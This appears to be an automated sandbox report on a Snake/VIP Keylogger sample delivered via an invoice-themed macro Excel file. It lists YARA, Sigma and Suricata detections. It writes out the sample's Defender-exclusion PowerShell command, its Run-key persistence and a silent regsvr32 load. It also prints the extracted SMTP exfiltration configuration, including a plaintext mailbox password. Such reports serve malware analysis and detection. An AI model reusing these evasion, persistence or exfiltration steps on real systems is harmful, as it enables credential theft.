22.2.PO202502SNAKWS.exe.1b37f45caa0.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e522:$a1: get_encryptedPassword 0x2e84b:$a2: get_encryptedUsername 0x2e332:$a3: get_timePasswordChanged 0x2e43b:$a4: get_passwordField 0x2e538:$a5: set_encryptedPassword 0x2fc26:$a7: get_logins 0x2fb89:$a10: KeyLoggerEventArgs 0x2f7ee:$a11: KeyLoggerEventArgsEventHandler
22.2.PO202502SNAKWS.exe.1b37f45caa0.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c666:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3bd09:$a3: \Google\Chrome\User Data\Default\Login Data 0x3bf66:$a4: \Orbitum\User Data\Default\Login Data 0x3c945:$a5: \Kometa\User Data\Default\Login Data
22.2.PO202502SNAKWS.exe.1b37f45caa0.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f152:$s1: UnHook 0x2f159:$s2: SetHook 0x2f161:$s3: CallNextHook 0x2f16e:$s4: _hook
6.2.PO202502SNAKWS.exe.2763805caa0.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d352:$s1: UnHook 0x2d359:$s2: SetHook 0x2d361:$s3: CallNextHook 0x2d36e:$s4: _hook
6.2.PO202502SNAKWS.exe.2763805caa0.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.PO202502SNAKWS.exe.2763805caa0.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
6.2.PO202502SNAKWS.exe.2763805caa0.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.PO202502SNAKWS.exe.2763805caa0.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e522:$a1: get_encryptedPassword 0x2e84b:$a2: get_encryptedUsername 0x2e332:$a3: get_timePasswordChanged 0x2e43b:$a4: get_passwordField 0x2e538:$a5: set_encryptedPassword 0x2fc26:$a7: get_logins 0x2fb89:$a10: KeyLoggerEventArgs 0x2f7ee:$a11: KeyLoggerEventArgsEventHandler
6.2.PO202502SNAKWS.exe.2763805caa0.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c666:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3bd09:$a3: \Google\Chrome\User Data\Default\Login Data 0x3bf66:$a4: \Orbitum\User Data\Default\Login Data 0x3c945:$a5: \Kometa\User Data\Default\Login Data
6.2.PO202502SNAKWS.exe.2763805caa0.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f152:$s1: UnHook 0x2f159:$s2: SetHook 0x2f161:$s3: CallNextHook 0x2f16e:$s4: _hook
Click to see the 34 entries

Sigma Signatures

System Summary

Sigma detected: Legitimate Application Dropped Archive

Source: File created

Author: frack113, Florian Roth: Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ProcessId: 6904, TargetFilename: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.zip

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe", ParentImage: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe, ParentProcessId: 7008, ParentProcessName: PO202502SNAKWS.exe, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", ProcessId: 5956, ProcessName: powershell.exe

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Source: Process started

Author: Jason Lynch: Data: Command: "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe", CommandLine: "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 6904, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe", ProcessId: 7008, ProcessName: PO202502SNAKWS.exe

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll", CommandLine: "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 6904, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll", ProcessId: 7080, ProcessName: regsvr32.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: cmd.exe /C start "" /D "C:\Users\user\SystemRootDoc" "C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe, ProcessId: 7008, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PO202502SNAKWS

Sigma detected: Excel Network Connections

Source: Network Connection

Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 149.137.128.16, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6904, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49686

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Office Outbound Connections

Source: Network Connection

Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.10, DestinationIsIpv6: false, DestinationPort: 49686, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6904, Protocol: tcp, SourceIp: 149.137.128.16, SourceIsIpv6: false, SourcePort: 443

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 199.188.200.59, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, Initiated: true, ProcessId: 2352, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49753

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe", ParentImage: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe, ParentProcessId: 7008, ParentProcessName: PO202502SNAKWS.exe, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", ProcessId: 5956, ProcessName: powershell.exe

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ProcessId: 6904, TargetFilename: C:\Users\user\Desktop\~$PO202503S.xlsm

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7012, ProcessName: svchost.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-11T09:11:05.457122+0100	2028371	3	Unknown Traffic	192.168.2.10	49754	13.107.253.67	443	TCP
2025-03-11T09:11:12.782867+0100	2028371	3	Unknown Traffic	192.168.2.10	49757	13.107.253.67	443	TCP
2025-03-11T09:11:12.788027+0100	2028371	3	Unknown Traffic	192.168.2.10	49758	13.107.253.67	443	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-11T09:10:31.148255+0100	2803305	3	Unknown Traffic	192.168.2.10	49702	104.21.112.1	443	TCP
2025-03-11T09:10:34.070648+0100	2803305	3	Unknown Traffic	192.168.2.10	49706	104.21.112.1	443	TCP
2025-03-11T09:10:34.541793+0100	2803305	3	Unknown Traffic	192.168.2.10	49707	104.21.112.1	443	TCP
2025-03-11T09:10:34.963786+0100	2803305	3	Unknown Traffic	192.168.2.10	49708	104.21.112.1	443	TCP
2025-03-11T09:10:37.455610+0100	2803305	3	Unknown Traffic	192.168.2.10	49712	104.21.112.1	443	TCP
2025-03-11T09:10:37.872783+0100	2803305	3	Unknown Traffic	192.168.2.10	49713	104.21.112.1	443	TCP
2025-03-11T09:10:38.830218+0100	2803305	3	Unknown Traffic	192.168.2.10	49714	104.21.112.1	443	TCP
2025-03-11T09:10:55.905775+0100	2803305	3	Unknown Traffic	192.168.2.10	49745	104.21.112.1	443	TCP
2025-03-11T09:10:57.290100+0100	2803305	3	Unknown Traffic	192.168.2.10	49748	104.21.112.1	443	TCP
2025-03-11T09:10:59.744756+0100	2803305	3	Unknown Traffic	192.168.2.10	49751	104.21.112.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-11T09:10:25.875770+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49692	132.226.247.73	80	TCP
2025-03-11T09:10:29.000800+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49692	132.226.247.73	80	TCP
2025-03-11T09:10:29.985140+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49699	132.226.247.73	80	TCP
2025-03-11T09:10:30.500734+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49701	132.226.247.73	80	TCP
2025-03-11T09:10:31.875754+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49705	132.226.247.73	80	TCP
2025-03-11T09:10:32.422689+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49699	132.226.247.73	80	TCP
2025-03-11T09:10:32.938275+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49701	132.226.247.73	80	TCP
2025-03-11T09:10:35.264093+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49710	132.226.247.73	80	TCP
2025-03-11T09:10:36.703874+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49711	132.226.247.73	80	TCP
2025-03-11T09:10:39.204024+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49715	132.226.247.73	80	TCP
2025-03-11T09:10:39.578882+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49717	132.226.247.73	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-11T09:10:56.339611+0100	1810007	1	Potentially Bad Traffic	192.168.2.10	49746	149.154.167.220	443	TCP
2025-03-11T09:10:59.652197+0100	1810007	1	Potentially Bad Traffic	192.168.2.10	49750	149.154.167.220	443	TCP
2025-03-11T09:11:02.218139+0100	1810007	1	Potentially Bad Traffic	192.168.2.10	49752	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: PO202503S.xlsm

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\SystemRootDoc\msvcp290.dll	Avira: detection malicious, Label: TR/AVI.Agent.fpuzj
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\msvcp290.dll	Avira: detection malicious, Label: TR/AVI.Agent.fpuzj

Found malware configuration

Source: 0000001B.00000002.1378826053.0000015F2A400000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "logzdelivery@groupscrea.com", "Password": "cletus1905@", "Host": "mail.groupscrea.com", "Port": "587"}
Source: 0000001B.00000002.1378826053.0000015F2A400000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "logzdelivery@groupscrea.com", "Password": "cletus1905@", "Host": "mail.groupscrea.com", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\invoice_temp\msvcp290.dll	ReversingLabs: Detection: 23%
Source: C:\Users\user\SystemRootDoc\msvcp290.dll	ReversingLabs: Detection: 23%

Multi AV Scanner detection for submitted file

Source: PO202503S.xlsm

Virustotal: Detection: 16%

Perma Link

Sample uses string decryption to hide its real strings

Source: 6.2.PO202502SNAKWS.exe.2763805caa0.0.raw.unpack	String decryptor: logzdelivery@groupscrea.com
Source: 6.2.PO202502SNAKWS.exe.2763805caa0.0.raw.unpack	String decryptor: cletus1905@
Source: 6.2.PO202502SNAKWS.exe.2763805caa0.0.raw.unpack	String decryptor: mail.groupscrea.com
Source: 6.2.PO202502SNAKWS.exe.2763805caa0.0.raw.unpack	String decryptor: alibobologz@groupscrea.com
Source: 6.2.PO202502SNAKWS.exe.2763805caa0.0.raw.unpack	String decryptor: 587
Source: 6.2.PO202502SNAKWS.exe.2763805caa0.0.raw.unpack	String decryptor:

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Phishing

AI detected landing page (webpage, office document or email)

Source: Screenshot id: 2	Joe Sandbox AI: Screenshot id: 2 contains prominent button: 'view document'
Source: Screenshot id: 3	Joe Sandbox AI: Page contains button: 'View Document' Source: 'Screenshot id: 3'
Source: Screenshot id: 3	Joe Sandbox AI: Screenshot id: 3 contains prominent button: 'view document'
Source: Screenshot id: 4	Joe Sandbox AI: Page contains button: 'View Document' Source: 'Screenshot id: 4'
Source: Screenshot id: 4	Joe Sandbox AI: Screenshot id: 4 contains prominent button: 'view document'

Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.10:49700 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.10:49703 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.10:49704 version: TLS 1.0

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 149.137.128.16:443 -> 192.168.2.10:49686 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.253.67:443 -> 192.168.2.10:49754 version: TLS 1.2

Source:	Binary string: System.Windows.Forms.pdb source: AddInProcess32.exe, 0000000A.00000002.6561961431.0000000006647000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6560823931.000000000652B000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6558369408.0000000005FF7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: AddInProcess32.pdb source: AddInProcess32.exe, 0000000A.00000002.6561961431.0000000006647000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6560823931.000000000652B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdbt source: AddInProcess32.exe, 0000000A.00000002.6561961431.0000000006647000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6560823931.000000000652B000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6558369408.0000000005FF7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: InstallUtil.exe, 0000001E.00000002.6558369408.0000000005FF9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 0000000A.00000002.6561961431.0000000006647000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6560823931.000000000652B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb source: InstallUtil.exe, 0000001E.00000002.6558369408.0000000005FF9000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD10391950 SetLastError,FindFirstFileExW,GetLastError,		6_2_00007FFD10391950
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F061950 SetLastError,FindFirstFileExW,GetLastError,		22_2_00007FFD0F061950

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Process created: C:\Program Files\7-Zip\7z.exe

Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	6_2_00007FF767D921F3
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then mov eax, dword ptr [rcx]	6_2_00007FF767D955C0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then mov eax, dword ptr [rsi]	6_2_00007FF767D97A50
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then sub rsp, 38h	6_2_00007FFD1015D640
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then xor eax, eax	6_2_00007FFD100F1650
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	6_2_00007FFD10147980
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rsi	6_2_00007FFD1016D9D0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	6_2_00007FFD100E99C0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then sub rsp, 28h	6_2_00007FFD100FDB40
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then sub rsp, 28h	6_2_00007FFD100FDBB0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	6_2_00007FFD10191D30
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then test rdx, rdx	6_2_00007FFD1011DD60
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then sub rsp, 38h	6_2_00007FFD100FDEE0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rdi	6_2_00007FFD1018FF20
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push r14	6_2_00007FFD1018FF20
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then sub rsp, 28h	6_2_00007FFD10103FA0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push r15	6_2_00007FFD1010E120
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push r15	6_2_00007FFD1011819C
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	6_2_00007FFD10190160
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push r15	6_2_00007FFD10118170
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	6_2_00007FFD1017E1C0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push r15	6_2_00007FFD1016E240
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rdi	6_2_00007FFD100F6260
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	6_2_00007FFD10104340
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	6_2_00007FFD10104340
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	6_2_00007FFD10104340
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rsi	6_2_00007FFD101045A0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	6_2_00007FFD10104630
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	6_2_00007FFD10104630
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then sub rsp, 28h	6_2_00007FFD101046F0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rbp	6_2_00007FFD1018C9E0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push r15	6_2_00007FFD1010CCA0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then cmp byte ptr [rcx+1Dh], 00000000h	6_2_00007FFD1017CDE0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then mov rcx, qword ptr [rcx+08h]	6_2_00007FFD100F0F10
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then test rdx, rdx	6_2_00007FFD1011F040
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	6_2_00007FFD100F5030
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then mov rcx, qword ptr [rcx+08h]	6_2_00007FFD10345FB0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then sub rsp, 28h	6_2_00007FFD103510B0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then sub rsp, 28h	6_2_00007FFD103513C0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rdi	6_2_00007FFD1034B370
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then sub rsp, 28h	6_2_00007FFD10357870
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	6_2_00007FFD10357B60
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	6_2_00007FFD10357B60
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	6_2_00007FFD10357B60
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	6_2_00007FFD10349CF0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rsi	6_2_00007FFD1038DD10
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then sub rsp, 28h	6_2_00007FFD10357DC0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rsi	6_2_00007FFD1038DD60
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rdi	6_2_00007FFD103E7E00
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push r14	6_2_00007FFD103E7E00
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	6_2_00007FFD10357E10
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	6_2_00007FFD10357E10
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rbp	6_2_00007FFD103E3EC0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then sub rsp, 28h	6_2_00007FFD10357ED0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rsi	6_2_00007FFD10357F20
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then cmp edx, 02h	6_2_00007FFD103C6100
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then sub rsp, 38h	6_2_00007FFD103AC1E0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rsi	6_2_00007FFD1036A460
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	6_2_00007FFD10396580
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push r15	6_2_00007FFD103625E0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	6_2_00007FFD10342830
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	6_2_00007FFD10390900
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then sub rsp, 28h	6_2_00007FFD10390900
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rbp	6_2_00007FFD10312C25
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then test r8d, r8d	6_2_00007FFD103D4D20
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	6_2_00007FFD10390900
